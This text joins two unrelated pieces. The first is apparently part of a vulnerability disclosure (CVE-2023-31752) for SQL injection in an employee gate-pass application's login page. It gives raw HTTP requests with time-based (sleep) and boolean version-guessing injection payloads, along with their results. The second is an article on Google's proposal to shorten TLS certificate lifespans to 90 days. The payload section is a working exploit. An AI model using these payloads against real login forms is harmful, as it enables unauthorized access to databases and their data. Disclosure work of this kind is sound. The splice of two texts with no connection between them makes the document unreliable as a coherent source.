    POST /employee_gatepass/classes/login.php?f=login HTTP/1.1
    Host: 127.0.0.1
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
    sec-ch-ua-mobile: ?0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 32
    
    username=admin' and (select 2 from (select(sleep(10)))x) and 'x'='x&password=admin123
    

The server's response time is 10 seconds

Payload2:username=admin'and left(version(),6)='5.7.27' AND 'ledo'='ledo&password=admin123

    POST /employee_gatepass/classes/login.php?f=login HTTP/1.1
    Host: 127.0.0.1
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
    sec-ch-ua-mobile: ?0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 32
    
    username=admin'and left(version(),6)='5.7.26' AND 'ledo'='ledo&password=admin123
    

Error injection success

When I enter the version number 5.7.26, it returns "success". Error statement when typing 5.7.27

CVE-2023-31752: bug_report/SQLi-2.md at main · 4O4NtFd/bug_report

Shorter certificate lifespans are beneficial, but they require a rethink of how to properly manage them.

On March 3, Google (via The Chromium Projects, which it controls) proposed a plan to drastically shorten the lifespan of Transport Layer Security (TLS) digital certificates, from 398 days to 90 days. This will spur significant changes in how organizations manage their certificates, particularly regarding automated processes.

The proposal by the open source body behind the Google Chrome browser and Chrome OS, included in a road map called "Moving Forward, Together," is a positive step toward ensuring more reliable, robust Web operations. But it will require companies and other organizations to significantly transform their certificate processes.

The lifespan of digital certificates has fallen steadily over the past decade, from five years in 2012 to a little more than two years in 2018 to 13 months, or 398 days, in July 2020. The shorter lifespans help ensure the accuracy of digital identities, especially in a cloud-based computing environment where websites and services are constantly being spun up or down to accommodate changing demands and priorities.

Google said the proposed changes would allow for faster adoption of improvements, such as best practices and new security capabilities, and encourage organizations to move away from time-consuming and error-prone manual processes. The resulting move toward automation would also better prepare organizations for the advent of post-quantum cryptography.

**A Wake-up Call for Certificate Monitoring**

If adopted, the Chromium Projects' proposal to the CA/Browser Forum — a consortium of certification authorities (CA), browser makers, and others — would most likely take effect by the end of 2024. And although the changes are not set in stone, the prospects of a considerably shorter lifespan should serve as a wake-up call for organizations. They need to get greater control and visibility over their public keys and certificates, because the proposal is a sure sign that the game has changed.

The five-year life of certificates from a decade ago reflected a different time, when teams could get a certificate for, say, a Web server and then pretty much forget about it. They never developed a routine for checking to see if certificates were about to expire or for renewing them, which could lead to certificate-related outages. The eventual shortening of certificate life to 398 days helped put teams on a schedule they could get comfortable with, checking regularly for expirations.

As organizations expand in the cloud, visibility of TLS (also known as Secure Sockets Layer, or SSL) certificates is critical. And the layered, increasingly complex environments in the cloud are beyond the ability of teams to keep track of manually. Now, with the proposed new validity period, it's about automating the process.

Currently, organizations dedicate their resources to the people and processes necessary for installing certificates. In the near future, they'll need people and resources for automating the process, which will involve programming and maintaining new software. The focus will shift somewhat from knowledge of public key infrastructure (PKI) — which is at the core of TLS — to internal infrastructure knowledge.

**Centralized Monitoring Is Critical**

To manage the certificate workload, organizations will need to centralize certificate monitoring in order to easily identify certificates that are about to expire. Without a centralized view, it's still possible to spin up a server, get a certificate for it, and then forget about it, which can lead to disaster. A 2022 Ponemon Institute study found that half of respondents had suffered at least one certificate-related attack in the previous two years, and that 58% of them described the financial consequences as "severe."

Centralized monitoring also involves more than checking expiration dates on certificates. Organizations also will need to monitor how certificates are being used on their servers. It's not uncommon for certificates to be deployed to the wrong servers, leaving some servers without the certificates they need for their workloads. In a small company with a handful of employees, everyone may know what's running where. But in a 5,000-person enterprise, it can be impossible to keep track of it all without a centralized view.

The interconnected nature of business operations may also require that TLS visibility extend to supply chains, because a compromise of even a small system within a connected environment can have a huge impact on operations. Organizations may want to consider the advantage of outside monitoring services, rather than keeping everything in-house.

**Looking Ahead**

The full impact of the Chromium Projects' proposal has yet to be determined. There seems to be a couple of gray areas, such as whether it might apply to Internet of Things devices such as, for example, security cameras that also use certificates, or if it's limited to just Web servers.

But no matter what happens with the proposal, it reflects the reality of today's environment. Shorter certificate lifespans are beneficial, but organizations will certainly need to rethink how they can properly manage them.

Tag

#chrome